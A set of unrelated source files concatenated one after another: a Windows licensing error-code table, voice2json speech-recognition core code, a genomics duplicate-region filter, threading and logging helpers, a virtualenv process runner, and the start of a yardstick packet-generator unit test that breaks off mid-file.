'SL_E_TKA_CHALLENGE_MISMATCH' : (0xC004F309, 'The Software Licensing Service reported that the product could not be activated. Activation challenge and response do not match.'),
'SL_E_TKA_INVALID_CERTIFICATE' : (0xC004F30A, 'The Software Licensing Service reported that the product could not be activated. The certificate does not match the conditions in the license.'),
'SL_E_TKA_INVALID_SMARTCARD' : (0xC004F30B, 'The Software Licensing Service reported that the inserted smartcard could not be used to activate the product.'),
'SL_E_TKA_FAILED_GRANT_PARSING' : (0xC004F30C, 'The Software Licensing Service reported that the token-based activation license content is invalid.'),
'SL_E_TKA_INVALID_THUMBPRINT' : (0xC004F30D, 'The Software Licensing Service reported that the product could not be activated. The thumbprint is invalid.'),
'SL_E_TKA_THUMBPRINT_CERT_NOT_FOUND' : (0xC004F30E, 'The Software Licensing Service reported that the product could not be activated. The thumbprint does not match any certificate.'),
'SL_E_TKA_CRITERIA_MISMATCH' : (0xC004F30F, 'The Software Licensing Service reported that the product could not be activated. The certificate does not match the criteria specified in the issuance license.'),
'SL_E_TKA_TPID_MISMATCH' : (0xC004F310, 'The Software Licensing Service reported that the product could not be activated. The certificate does not match the trust point identifier (TPID) specified in the issuance license.'),
'SL_E_TKA_SOFT_CERT_DISALLOWED' : (0xC004F311, 'The Software Licensing Service reported that the product could not be activated. A soft token cannot be used for activation.'),
'SL_E_TKA_SOFT_CERT_INVALID' : (0xC004F312, 'The Software Licensing Service reported that the product could not be activated. The certificate cannot be used because its private key is exportable.'),
'SL_E_TKA_CERT_CNG_NOT_AVAILABLE' : (0xC004F313, 'The Software Licensing Service reported that the CNG encryption library could not be loaded. The current certificate may not be available on this version of Windows.'),
'E_RM_UNKNOWN_ERROR' : (0xC004FC03, 'A networking problem has occurred while activating your copy of Windows.'),
'SL_I_TIMEBASED_VALIDITY_PERIOD' : (0x4004FC04, 'The Software Licensing Service reported that the application is running within the timebased validity period.'),
'SL_I_PERPETUAL_OOB_GRACE_PERIOD' : (0x4004FC05, 'The Software Licensing Service reported that the application has a perpetual grace period.'),
'SL_I_TIMEBASED_EXTENDED_GRACE_PERIOD' : (0x4004FC06, 'The Software Licensing Service reported that the application is running within the valid extended grace period.'),
'SL_E_VALIDITY_PERIOD_EXPIRED' : (0xC004FC07, 'The Software Licensing Service reported that the validity period expired.'),
'SL_E_IA_THROTTLE_LIMIT_EXCEEDED' : (0xC004FD00, "You've reached the request limit for automatic virtual machine activation. Try again later."),
'SL_E_IA_INVALID_VIRTUALIZATION_PLATFORM' : (0xC004FD01, "Windows isn't running on a supported Microsoft Hyper-V virtualization platform."),
'SL_E_IA_PARENT_PARTITION_NOT_ACTIVATED' : (0xC004FD02, "Windows isn't activated on the host machine. Please contact your system administrator."),
'SL_E_IA_ID_MISMATCH' : (0xC004FD03, "The host machine can't activate the edition of Windows on the virtual machine."),
'SL_E_IA_MACHINE_NOT_BOUND' : (0xC004FD04, "Windows isn't activated."),
'SL_E_TAMPER_RECOVERY_REQUIRES_ACTIVATION' : (0xC004FE00, 'The Software Licensing Service reported that activation is required to recover from tampering of SL Service trusted store.'),
}
|
core.py | """
Core voice2json command support.
"""
import asyncio
import io
import logging
import os
import queue
import shlex
import ssl
import sys
import threading
import typing
import wave
from pathlib import Path
import pydash
_LOGGER = logging.getLogger("voice2json.core")
# -----------------------------------------------------------------------------
class Voice2JsonCore:
"""Core voice2json command support."""
def __init__(
self,
profile_file: Path,
profile: typing.Dict[str, typing.Any],
certfile: typing.Optional[str] = None,
keyfile: typing.Optional[str] = None,
):
"""Initialize voice2json."""
self.profile_file = profile_file
self.profile_dir = profile_file.parent
self.profile = profile
# Shared aiohttp client session (enable SSL)
self.ssl_context = ssl.SSLContext()
if certfile:
_LOGGER.debug("Using SSL certificate %s (keyfile=%s)", certfile, keyfile)
self.ssl_context.load_cert_chain(certfile, keyfile)
self._http_session = None
@property
def http_session(self):
"""Get or create async HTTP session."""
import aiohttp
if not self._http_session:
self._http_session = aiohttp.ClientSession()
return self._http_session
# -------------------------------------------------------------------------
# train-profile
# -------------------------------------------------------------------------
async def train_profile(self):
"""Generate speech/intent artifacts for a profile."""
from . import train
await train.train_profile(self.profile_dir, self.profile)
# -------------------------------------------------------------------------
# transcribe-wav
# -------------------------------------------------------------------------
def get_transcriber(self, open_transcription=False, debug=False):
"""Create Transcriber based on profile speech system."""
from .train import AcousticModelType
# Load settings
acoustic_model_type = AcousticModelType(
pydash.get(
self.profile, "speech-to-text.acoustic-model-type", "pocketsphinx"
).lower()
)
if acoustic_model_type == AcousticModelType.POCKETSPHINX:
# Pocketsphinx
return self.get_pocketsphinx_transcriber(
open_transcription=open_transcription, debug=debug
)
if acoustic_model_type == AcousticModelType.KALDI:
# Kaldi
return self.get_kaldi_transcriber(
open_transcription=open_transcription, debug=debug
)
if acoustic_model_type == AcousticModelType.JULIUS:
# Julius
return self.get_julius_transcriber(
open_transcription=open_transcription, debug=debug
)
if acoustic_model_type == AcousticModelType.DEEPSPEECH:
# DeepSpeech
return self.get_deepspeech_transcriber(
open_transcription=open_transcription, debug=debug
)
raise ValueError(f"Unsupported acoustic model type: {acoustic_model_type}")
def get_pocketsphinx_transcriber(self, open_transcription=False, debug=False):
"""Create Transcriber for Pocketsphinx."""
from rhasspyasr_pocketsphinx import PocketsphinxTranscriber
# Load settings
acoustic_model = self.ppath("speech-to-text.acoustic-model", "acoustic_model")
assert acoustic_model, "Missing acoustic model"
if open_transcription:
# Use base dictionary/language model
dictionary = self.ppath(
"speech-to-text.base-dictionary", "base_dictionary.txt"
)
language_model = self.ppath(
"speech-to-text.base-language-model", "base_language_model.txt"
)
else:
# Use custom dictionary/language model
dictionary = self.ppath("speech-to-text.dictionary", "dictionary.txt")
language_model = self.ppath(
"speech-to-text.language-model", "language_model.txt"
)
assert dictionary and language_model, "Missing dictionary or language model"
mllr_matrix = self.ppath(
"speech-to-text.pocketsphinx.mllr-matrix", "mllr_matrix"
)
return PocketsphinxTranscriber(
acoustic_model,
dictionary,
language_model,
mllr_matrix=mllr_matrix,
debug=debug,
)
def get_kaldi_transcriber(self, open_transcription=False, debug=False):
"""Create Transcriber for Kaldi."""
from rhasspyasr_kaldi import KaldiCommandLineTranscriber, KaldiModelType
# Load settings
model_type = KaldiModelType(
pydash.get(self.profile, "speech-to-text.kaldi.model-type")
)
acoustic_model = self.ppath("speech-to-text.acoustic-model", "acoustic_model")
assert acoustic_model, "Missing acoustic model"
if open_transcription:
# Use base graph
graph_dir = self.ppath("speech-to-text.kaldi.base-graph-directory") or (
acoustic_model / "model" / "graph"
)
else:
# Use custom graph
graph_dir = self.ppath("speech-to-text.kaldi.graph-directory") or (
acoustic_model / "graph"
)
# Use kaldi-decode script
return KaldiCommandLineTranscriber(model_type, acoustic_model, graph_dir)
def get_deepspeech_transcriber(self, open_transcription=False, debug=False):
"""Create Transcriber for DeepSpeech."""
from rhasspyasr_deepspeech import DeepSpeechTranscriber
# Load settings
acoustic_model = self.ppath(
"speech-to-text.acoustic-model", "model/output_graph.pbmm"
)
assert acoustic_model, "Missing acoustic model"
if open_transcription:
# Use base model
scorer = self.ppath(
"speech-to-text.deepspeech.base-scorer", "model/base.scorer"
)
else:
# Use custom model
scorer = self.ppath("speech-to-text.deepspeech.scorer", "scorer")
assert scorer, "Missing language model or scorer"
return DeepSpeechTranscriber(acoustic_model, scorer)
def get_julius_transcriber(self, open_transcription=False, debug=False):
"""Create Transcriber for Julius."""
from .julius import JuliusTranscriber
# Load settings
acoustic_model = self.ppath("speech-to-text.acoustic-model", "acoustic_model")
assert acoustic_model, "Missing acoustic model"
if open_transcription:
# Use base dictionary/language model
dictionary = self.ppath(
"speech-to-text.base-dictionary", "base_dictionary.txt"
)
language_model = self.ppath(
"speech-to-text.base-language-model", "base_language_model.bin"
)
else:
# Use custom dictionary/language model
dictionary = self.ppath("speech-to-text.dictionary", "dictionary.txt")
language_model = self.ppath(
"speech-to-text.language-model", "language_model.txt"
)
assert dictionary and language_model, "Missing dictionary or language model"
return JuliusTranscriber(
self, acoustic_model, dictionary, language_model, debug=debug
)
# -------------------------------------------------------------------------
# record-command
# -------------------------------------------------------------------------
def get_command_recorder(self):
"""Get voice command recorder based on profile settings."""
from rhasspysilence import WebRtcVadRecorder
# Load settings
vad_mode = int(pydash.get(self.profile, "voice-command.vad-mode", 3))
min_seconds = float(
pydash.get(self.profile, "voice-command.minimum-seconds", 1)
)
max_seconds = float(
pydash.get(self.profile, "voice-command.maximum-seconds", 30)
)
speech_seconds = float(
pydash.get(self.profile, "voice-command.speech-seconds", 0.3)
)
silence_seconds = float(
pydash.get(self.profile, "voice-command.silence-seconds", 0.5)
)
before_seconds = float(
pydash.get(self.profile, "voice-command.before-seconds", 0.5)
)
skip_seconds = float(pydash.get(self.profile, "voice-command.skip-seconds", 0))
chunk_size = int(pydash.get(self.profile, "voice-command.chunk-size", 960))
sample_rate = int(
pydash.get(self.profile, "audio.format.sample-rate-hertz", 16000)
)
return WebRtcVadRecorder(
vad_mode=vad_mode,
sample_rate=sample_rate,
chunk_size=chunk_size,
min_seconds=min_seconds,
max_seconds=max_seconds,
speech_seconds=speech_seconds,
silence_seconds=silence_seconds,
before_seconds=before_seconds,
skip_seconds=skip_seconds,
)
# -------------------------------------------------------------------------
# Utilities
# -------------------------------------------------------------------------
def ppath(
self, query: str, default: typing.Optional[str] = None
) -> typing.Optional[Path]:
"""Return path from profile or path relative to the profile directory."""
result = pydash.get(self.profile, query)
if result is None:
if default is not None:
result = self.profile_dir / Path(default)
else:
result = Path(result)
return result
async def convert_wav(self, wav_data: bytes) -> bytes:
"""Convert WAV data to expected audio format."""
convert_cmd_str = pydash.get(
self.profile,
"audio.convert-command",
"sox -t wav - -r 16000 -e signed-integer -b 16 -c 1 -t wav -",
)
convert_cmd = shlex.split(convert_cmd_str)
_LOGGER.debug(convert_cmd)
convert_proc = await asyncio.create_subprocess_exec(
*convert_cmd, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE
)
converted_data, _ = await convert_proc.communicate(input=wav_data)
return converted_data
async def maybe_convert_wav(self, wav_data: bytes) -> bytes:
"""Convert WAV data to expected audio format if necessary."""
expected_rate = int(
pydash.get(self.profile, "audio.format.sample-rate-hertz", 16000)
)
expected_width = (
int(pydash.get(self.profile, "audio.format.sample-width-bits", 16)) // 8
)
expected_channels = int(
pydash.get(self.profile, "audio.format.channel-count", 1)
)
with io.BytesIO(wav_data) as wav_io:
with wave.open(wav_io, "rb") as wav_file:
rate, width, channels = (
wav_file.getframerate(),
wav_file.getsampwidth(),
wav_file.getnchannels(),
)
if (
(rate != expected_rate)
or (width != expected_width)
or (channels != expected_channels)
):
_LOGGER.debug(
"Got %s Hz, %s byte(s), %s channel(s). Needed %s Hz, %s byte(s), %s channel(s)",
rate,
width,
channels,
expected_rate,
expected_width,
expected_channels,
)
# Do conversion
if rate < expected_rate:
# Probably being given 8Khz audio
_LOGGER.warning(
"Upsampling audio from %s to %s Hz. Expect poor performance!",
rate,
expected_rate,
)
return await self.convert_wav(wav_data)
# Return original data
return wav_data
def buffer_to_wav(self, buffer: bytes) -> bytes:
"""Wraps a buffer of raw audio data in a WAV"""
rate = int(pydash.get(self.profile, "audio.format.sample-rate-hertz", 16000))
width = int(pydash.get(self.profile, "audio.format.sample-width-bits", 16)) // 8
channels = int(pydash.get(self.profile, "audio.format.channel-count", 1))
with io.BytesIO() as wav_buffer:
wav_file: wave.Wave_write = wave.open(wav_buffer, mode="wb")
with wav_file:
wav_file.setframerate(rate)
wav_file.setsampwidth(width)
wav_file.setnchannels(channels)
wav_file.writeframesraw(buffer)
return wav_buffer.getvalue()
async def get_audio_source(self):
"""Start a recording subprocess for expected audio format."""
record_cmd_str = pydash.get(
self.profile,
"audio.record-command",
"arecord -q -r 16000 -c 1 -f S16_LE -t raw",
)
record_cmd = shlex.split(record_cmd_str)
_LOGGER.debug(record_cmd)
record_proc = await asyncio.create_subprocess_exec(
record_cmd[0], *record_cmd[1:], stdout=asyncio.subprocess.PIPE
)
class FakeBinaryIO:
"""Terminate subprocess when closing stream."""
def __init__(self, proc):
self.proc = proc
async def read(self, n):
"""Read n bytes from stream."""
assert self.proc, "Process not running"
return await self.proc.stdout.read(n)
async def close(self):
"""Terminate process."""
if self.proc:
_proc = self.proc
self.proc = None
_proc.terminate()
await _proc.wait()
return FakeBinaryIO(record_proc)
# -------------------------------------------------------------------------
async def stop(self):
"""Stop core."""
if self._http_session:
await self._http_session.close()
self._http_session = None
# -------------------------------------------------------------------------
def check_trained(self) -> bool:
"""True if profile is trained."""
# Load settings
intent_graph_path = self.ppath(
"intent-recognition.intent-graph", "intent.pickle.gz"
)
missing = False
for path in [intent_graph_path]:
if not (path and path.exists()):
missing = True
break
return not missing
# -------------------------------------------------------------------------
async def make_audio_source(self, audio_source: str) -> typing.Any:
"""Create an async audio source from command-line argument."""
if audio_source is None:
# Process source
_LOGGER.debug("Recording raw 16-bit 16Khz mono audio")
return await self.get_audio_source()
if audio_source == "-":
# Standard input source
if os.isatty(sys.stdin.fileno()):
print(
"Recording raw 16-bit 16Khz mono audio from stdin", file=sys.stderr
)
return AsyncStdinReader()
# File source
import aiofiles
_LOGGER.debug("Recording raw 16-bit 16Khz mono audio from %s", audio_source)
return await aiofiles.open(audio_source, "rb")
# -----------------------------------------------------------------------------
class AsyncStdinReader:
"""Wrap sys.stdin.buffer in an async reader."""
def __init__(self, loop: typing.Optional[asyncio.AbstractEventLoop] = None):
self.loop = loop or asyncio.get_event_loop()
self.read_n_queue: "queue.Queue[int]" = queue.Queue()
self.read_result_queue: "asyncio.Queue[bytes]" = asyncio.Queue()
self.read_thread: typing.Optional[threading.Thread] = None
async def read(self, n: int) -> bytes:
"""Some bytes from stdin buffer."""
if not self.read_thread:
self.read_thread = threading.Thread(target=self._read_stdin, daemon=True)
self.read_thread.start()
self.read_n_queue.put(n)
data = await self.read_result_queue.get()
return data
async def close(self):
"""Shut down read thread."""
self.read_n_queue.put(None)
if self.read_thread:
self.read_thread.join(timeout=0.5)
self.read_thread = None
def _read_stdin(self):
"""Get requests to read some number of bytes and process them."""
n = self.read_n_queue.get()
while n is not None:
result = sys.stdin.buffer.read(n)
self.loop.call_soon_threadsafe(self.read_result_queue.put_nowait, result)
n = self.read_n_queue.get()
|
Misc.py | import csv
import Stats
from Params import misc_params, stats_params, trees, analyze_params
import pysam
import multiprocessing as mp
import argparse
import os
acceptable_bases = {'A','C','G','T'}
def filter_by_trees(sites):
filtered_sites = list()
for site in sites:
genotype_dict = {tree:{'HET':0, 'HOM':0} for tree in trees.keys()}
for tree_name, tree in trees.items():
for sample in tree['samples']:
gt = site.samples[sample].info[:3]
if gt in genotype_dict[tree_name].keys():
genotype_dict[tree_name][gt] += 1
valid_row = True
for tree_name, tree in trees.items():
valid_row = valid_row and tree['params']['MIN_HET'] <= genotype_dict[tree_name]['HET'] and tree['params']['MIN_HOM'] <= genotype_dict[tree_name]['HOM']and tree['params']['MAX_HET'] >= genotype_dict[tree_name]['HET'] and tree['params']['MAX_HOM'] >= genotype_dict[tree_name]['HOM']
if valid_row:
filtered_sites.append(site)
return filtered_sites
def trees_stats(sites,output):
filtered_sites = list()
for site in sites:
genotype_dict = {tree:{'HET':0, 'HOM':0} for tree in trees.keys()}
for tree_name, tree in trees.items():
for sample in tree['samples']:
gt = site.samples[sample].info[:3]
if gt in genotype_dict[tree_name].keys():
genotype_dict[tree_name][gt] += 1
valid_row = True
for tree_name, tree in trees.items():
valid_row = valid_row and tree['params']['MIN_HOM'] <= genotype_dict[tree_name]['HOM']
if valid_row:
filtered_sites.append(site)
filtered_sites_2 = filter_by_trees(filtered_sites)
f = open(output+'_trees_stats.txt','w')
# f.write("Percentage of positions with at least one green: " + str(float(len(filtered_sites))/len(sites))+"\n")
# f.write("Percentage of positions with impossible genotype distributions: " + str(float(len(filtered_sites_2))/len(filtered_sites)) + "\n")
f.write(str(analyze_params['dp_tuple_limit']) + '\t' + str(analyze_params['tuples_internal_ratio']) + '\t' + str(analyze_params['tuples_ratio']) + '\t' + str(float(len(filtered_sites))/len(sites)) + '\t' + str(float(len(filtered_sites_2))/len(filtered_sites)) + "\n" )
return filtered_sites
def check_duplicate_region(sites):
filtered_sites = list()
if len(sites) > misc_params["mut_nr_limit"]:
sites_per_chrome = dict()
for s in sites:
if int(s.chrom) not in sites_per_chrome.keys():
sites_per_chrome[int(s.chrom)] = list()
sites_per_chrome[int(s.chrom)].append(s)
chrome_sites_list = sorted(sites_per_chrome.items())
for _, chrom_sites in chrome_sites_list:
if len(chrom_sites) > misc_params["mut_nr_limit"]:
for index, site in enumerate(chrom_sites):
left = index-misc_params["mut_nr_limit"] if index-misc_params["mut_nr_limit"] >= 0 else 0
right = index+misc_params["mut_nr_limit"]+1 if index+misc_params["mut_nr_limit"]+1 <= len(chrom_sites) else len(chrom_sites)
window_of_sites = chrom_sites[left:right]
in_duplicate_region = False
for i in range(len(window_of_sites)-misc_params["mut_nr_limit"]):
interval = window_of_sites[i:i+misc_params["mut_nr_limit"] + 1]
if max(interval, key=lambda s: s.pos).pos - min(interval, key=lambda s: s.pos).pos <= misc_params["mut_dist_limit"]:
in_duplicate_region = True
if not in_duplicate_region:
filtered_sites.append(site)
else:
print('removed site! position:', site.chrom, site.true_pos)
else:
filtered_sites += chrom_sites
else:
filtered_sites = sites
return filtered_sites
def snp_in_duplicate_region(snp, bam_file, reference_genome_file):
sites = dict()
left = snp['POS']-misc_params["snp_dist_limit"] if snp['POS']-misc_params["snp_dist_limit"] > 0 else 0
right = snp['POS']+misc_params["snp_dist_limit"]
for read in bam_file.fetch(snp['CHROM'], left, right):
if read.mapping_quality >= stats_params["mapping_quality"] and read.is_paired and read.is_proper_pair:
r = Stats.Read(read.query_name, None, read.query_sequence, read.get_aligned_pairs(),
read.reference_start, read.reference_end-1, read.query_qualities, read.mapping_quality, False)
for pos in r.bases.keys():
if pos >= left and pos <= right and r.base_quality[pos] > stats_params["base_quality"]:
if pos not in sites.keys():
sites[pos] = {'A':0, 'C':0, 'G':0, 'T':0}
sites[pos][r.bases[pos].upper()] += 1
reference = Stats.get_references(snp['CHROM'], left, right, reference_genome_file)
pos_list = list(sites.keys())
for pos in pos_list:
ref = reference[pos]
T = sum(sites[pos].values())
if ref not in acceptable_bases or float(sites[pos][ref])/T >= stats_params["bulk_ref_limit"]:
sites.pop(pos)
pos_list = sorted(list(sites.keys()))
in_duplicate_region = False
if len(pos_list) > misc_params["snp_nr_limit"]:
for i in range(len(pos_list)-misc_params["snp_nr_limit"] + 1):
interval = pos_list[i:i+misc_params["snp_nr_limit"]]
if max(interval) - min(interval) <= misc_params["snp_dist_limit"]:
in_duplicate_region = True
break
return in_duplicate_region
def SNP_duplicate_region(snp_path, bam_path, reference_path, queue):
SNP_reader = open(snp_path, 'r')
SNP_writer = open(snp_path[:-4] + '_not_duplicate_region_.tsv', 'w')
snps = []
SNP_reader.readline()
for line in SNP_reader:
CHROM, POS, REF, ALT = line.rstrip('\n').strip().split('\t')
snps.append({'CHROM':CHROM, 'POS':int(POS), 'REF':REF, 'ALT':ALT})
bam_file = pysam.AlignmentFile(bam_path, 'rb')
reference_genome_file = pysam.Fastafile(reference_path)
for snp in snps:
if not snp_in_duplicate_region(snp, bam_file, reference_genome_file):
SNP_writer.write(snp['CHROM'] + '\t' + str(snp['POS']) + '\t' + snp['REF'] + '\t' + snp['ALT'] + '\n')
queue.put(snp_path)
def duplicate_regions(snps_path, bam_path, reference_path, nodes=1, output_name="duplicate_regions"):
if not os.path.exists("./.conbase"):
os.makedirs("./.conbase")
if not os.path.exists("../results"):
os.makedirs("../results")
# os.system("rm ./.conbase/duplicate_region_*")
# os.system("rm ./.conbase/" + output_name + "_snp_chunk_*")
snps_chunks_path, _ = Stats.snps_to_chunks(snps_path, int(nodes), output_name)
jobs = []
queue = mp.Queue()
for snps_chunk_path in snps_chunks_path:
p = mp.Process(target=SNP_duplicate_region, args=(snps_chunk_path, bam_path, reference_path, queue))
jobs.append(p)
p.start()
for job in jobs:
job.join()
while not queue.empty():
queue.get()
print('all done')
f = open( '../results/' + output_name + '.tsv', 'w')
f.write('CHROM' + '\t' + 'POS' + '\t' + 'REF' + '\t' + 'ALT' + '\n')
f.close()
for snps_chunk_path in snps_chunks_path:
f = snps_chunk_path[:-4] + '_not_duplicate_region_.tsv'
os.system('cat '+f+' >> ../results/' + output_name + '.tsv')
os.system("rm ./.conbase/duplicate_region_*")
os.system("rm ./.conbase/" + output_name + "_snp_chunk_*")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Conbase preprocessing-tool for removing duplicate regions')
parser.add_argument('--duplicate_regions', nargs=5, metavar=("<snp path>", "<bam path>", "<reference path>", "<number of nodes>", "<output name>"))
args = parser.parse_args()
if args.duplicate_regions is not None:
duplicate_regions(*args.duplicate_regions)
# bulk_path = "/media/box2/Experiments/Joanna/Snake_analys/j_frisen_1602/Fibs/Tree2/FibBulk/FibBulk.reAligned.bwa.bam"
# reference_path = "/media/box2/reference_assemblies/bundle/2.8/b37/from_pall/human_g1k_v37.fasta"
# chrom = '1'
# chrom_sites = chrom_alt_sites(chrom, bulk_path, reference_path)
# chrom_duplicate_region(chrom,chrom_sites.keys())
|
Scheduler.py | import asyncio
import datetime
import os
import sys
import threading
import time
# import _thread as thread
from functools import wraps
TIME_ACCURACY = 1 # 时间精度,时间精度不是越小越好!你的Task每次循环超过了这个值,将影响准确度
start_time = int(time.time())
sql_clean_time = 45
def time_to_str(times=time.time()):
if times == 0:
return '2019-09-24 00:00:00'
date_array = datetime.datetime.utcfromtimestamp(times + (8 * 3600))
return date_array.strftime("%Y-%m-%d %H:%M:%S")
def get_filename():
# if sys.platform != 'win32':
fn = '%s/.anduin/%s-%s.log'%(os.path.expanduser('~'),sys.argv[0].split('/')[-1],start_time)
# else:
# fn = '%s\\.anduin\\%s-%s.log'%(os.path.expanduser('~'),sys.argv[0].split('\\')[-1],start_time)
return fn
fn = get_filename()
# if sys.platform != 'win32':
try:
os.mkdir('%s/.anduin'%os.path.expanduser('~'))
except Exception as e:
print(str(e))
print('anduin调用日志保存在%s'%get_filename())
# else:
# print('该操作系统为windows系统,暂时无法保存日志')
fh = open(fn, 'a')
def dbg(*args):
res = ['[%s Anduin Engine]'%time_to_str(int(time.time()))]+list(args)
print(*res)
if sys.platform != 'win32':
for i in res:
fh.write(str(i)+' ')
fh.write('\n')
# fh.close()
def IntervalTask(sec, func, params=(), immediatly=True, thread_name=''):
def run(*func_params):
if immediatly is False:
time.sleep(sec)
while 1:
func(*func_params)
time.sleep(sec)
# dbg(params)
t = threading.Thread(target=run, args=params)
if thread_name != '':
t.name = thread_name
t.start()
# t.join()
def normal_task(sec, func, params=(), thread_name=''):
def run(*func_params):
time.sleep(sec)
func(*func_params)
t = threading.Thread(target=run, args=params)
if thread_name != '':
t.name = thread_name
t.start()
# t.join()
# threading.enumerate()
# dbg(threading.enumerate())
def func_time(f):
"""
简单记录执行时间
:param f:
:return:
"""
@wraps(f)
def wrapper(*args, **kwargs):
start = time.time()
result = f(*args, **kwargs)
end = time.time()
info = str(f.__name__) + ' took ' + str(end - start) + ' seconds '
dbg(info)
return result
return wrapper
def create_async_event(async_r):
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
# new_loop.run_forever()
get_future = asyncio.ensure_future(async_r) # 相当于开启一个future
new_loop.run_until_complete(get_future) # 事件循环
result = get_future.result()
return result
def get_async_result(async_r):
loop = asyncio.get_event_loop()
loop.create_task(async_r)
# loop.run_until_complete(task)
# return task.result
def get_async_result_sql(async_r):
loop = asyncio.get_event_loop()
task = loop.create_task(async_r)
loop.run_until_complete(task)
return task.result()
def get_db_index(db_config_dict):
return db_config_dict['user'] + '@' + db_config_dict['host'] + ':' + db_config_dict['database']
if "__main__" == __name__:
# res = [(1,2,3),(4,5,6),(7,8,9)]
# dbg(turbo(foo,res))
get_filename()
|
arbiter.py | import logging
import os
import subprocess
import threading
from enum import Enum
from os.path import expanduser
from psutil import Popen
from smart_getenv import getenv
from virtualenvapi.manage import VirtualEnvironment
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ProcessState(Enum):
RUNNING = "running"
FAILED = "failed"
STOPPED = "stopped"
class Arbiter:
def __init__(
self,
script_type,
package_name,
version,
notify_failure,
notify_retry,
env,
):
self.type = script_type
self.package_name = package_name
self.version = version
self.package = f"{self.package_name}=={self.version}"
self.notify_failure = notify_failure
self.notify_retry = notify_retry
self.venv_name = f"kirby-{self.package_name}-{self.version}"
self.venv_created = False
self.env = env
self._process_return_value = None
self._thread = None
def ensure_environment(self, venvs_directory=None):
if not venvs_directory:
venvs_directory = getenv(
"KIRBY_VENV_DIRECTORY",
default=expanduser("~/.kirby/virtualenvs"),
)
venv_path = os.path.join(venvs_directory, self.venv_name)
logging.info(f"creating venv for {self.venv_name} at {venv_path}")
env = VirtualEnvironment(venv_path)
env.install(self.package_name)
return env
def raise_process(self):
venv = self.ensure_environment()
args = [
os.path.join(venv.path, "bin", "python"),
"-m",
self.package_name,
]
process = Popen(args, env=self.env, stdout=subprocess.PIPE)
process.wait()
retcode = process.returncode
output = process.stdout.read().decode("utf-8")
self._process_return_value = retcode, output
def run(self, block=False):
self._thread = threading.Thread(target=self.raise_process)
self._thread.start()
if block:
self.join()
def get_return_values(self):
return self._process_return_value
def join(self):
# TODO : Catch thread's errors
if self.status == ProcessState.RUNNING:
self._thread.join()
@property
def status(self):
if self._thread:
if self._thread.is_alive():
return ProcessState.RUNNING
return ProcessState.STOPPED
|
test_tg_vcmts_pktgen.py | # Copyright (c) 2019 Viosoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
import socket
import threading
import time
import os
import copy
from yardstick.benchmark.contexts import base as ctx_base
from yardstick.network_services.vnf_generic.vnf.base import VnfdHelper
from yardstick.network_services.vnf_generic.vnf import tg_vcmts_pktgen
from yardstick.common import exceptions
NAME = "tg__0"
class TestPktgenHelper(unittest.TestCase):
def test___init__(self):
pktgen_helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
self.assertEqual(pktgen_helper.host, "localhost")
self.assertEqual(pktgen_helper.port, 23000)
self.assertFalse(pktgen_helper.connected)
def _run_fake_server(self):
server_sock = socket.socket()
server_sock.bind(('localhost', 23000))
server_sock.listen(0)
client_socket, _ = server_sock.accept()
client_socket.close()
server_sock.close()
def test__connect(self):
pktgen_helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
self.assertFalse(pktgen_helper._connect())
server_thread = threading.Thread(target=self._run_fake_server)
server_thread.start()
time.sleep(0.5)
self.assertTrue(pktgen_helper._connect())
pktgen_helper._sock.close()
server_thread.join()
@mock.patch('yardstick.network_services.vnf_generic.vnf.tg_vcmts_pktgen.time')
def test_connect(self, *args):
pktgen_helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
pktgen_helper.connected = True
self.assertTrue(pktgen_helper.connect())
pktgen_helper.connected = False
pktgen_helper._connect = mock.MagicMock(return_value=True)
self.assertTrue(pktgen_helper.connect())
self.assertTrue(pktgen_helper.connected)
pktgen_helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
pktgen_helper._connect = mock.MagicMock(return_value=False)
self.assertFalse(pktgen_helper.connect())
self.assertFalse(pktgen_helper.connected)
def test_send_command(self):
pktgen_helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
self.assertFalse(pktgen_helper.send_command(""))
pktgen_helper.connected = True
pktgen_helper._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertFalse(pktgen_helper.send_command(""))
pktgen_helper._sock = mock.MagicMock()
self.assertTrue(pktgen_helper.send_command(""))
class TestVcmtsPktgenSetupEnvHelper(unittest.TestCase):
PKTGEN_PARAMETERS = "export LUA_PATH=/vcmts/Pktgen.lua;"\
"export CMK_PROC_FS=/host/proc;"\
" /pktgen-config/setup.sh 0 4 18:02.0 "\
"18:02.1 18:02.2 18:02.3 00:00.0 00:00.0 "\
"00:00.0 00:00.0 imix1_100cms_1ofdm.pcap "\
"imix1_100cms_1ofdm.pcap imix1_100cms_1ofdm.pcap "\
"imix1_100cms_1ofdm.pcap imix1_100cms_1ofdm.pcap "\
"imix1_100cms_1ofdm.pcap imix1_100cms_1ofdm.pcap "\
"imix1_100cms_1ofdm.pcap"
OPTIONS = {
"pktgen_values": "/tmp/pktgen_values.yaml",
"tg__0": {
"pktgen_id": 0
},
"vcmts_influxdb_ip": "10.80.5.150",
"vcmts_influxdb_port": 8086,
"vcmtsd_values": "/tmp/vcmtsd_values.yaml",
"vnf__0": {
"sg_id": 0,
"stream_dir": "us"
},
"vnf__1": {
"sg_id": 0,
"stream_dir": "ds"
}
}
def setUp(self):
vnfd_helper = VnfdHelper(
TestVcmtsPktgen.VNFD['vnfd:vnfd-catalog']['vnfd'][0])
ssh_helper = mock.Mock()
scenario_helper = mock.Mock()
scenario_helper.options = self.OPTIONS
self.setup_helper = tg_vcmts_pktgen.VcmtsPktgenSetupEnvHelper(
vnfd_helper, ssh_helper, scenario_helper)
def test_generate_pcap_filename(self):
pcap_file_name = self.setup_helper.generate_pcap_filename(\
TestVcmtsPktgen.PKTGEN_POD_VALUES[0]['ports'][0])
self.assertEquals(pcap_file_name, "imix1_100cms_1ofdm.pcap")
def test_find_port_cfg(self):
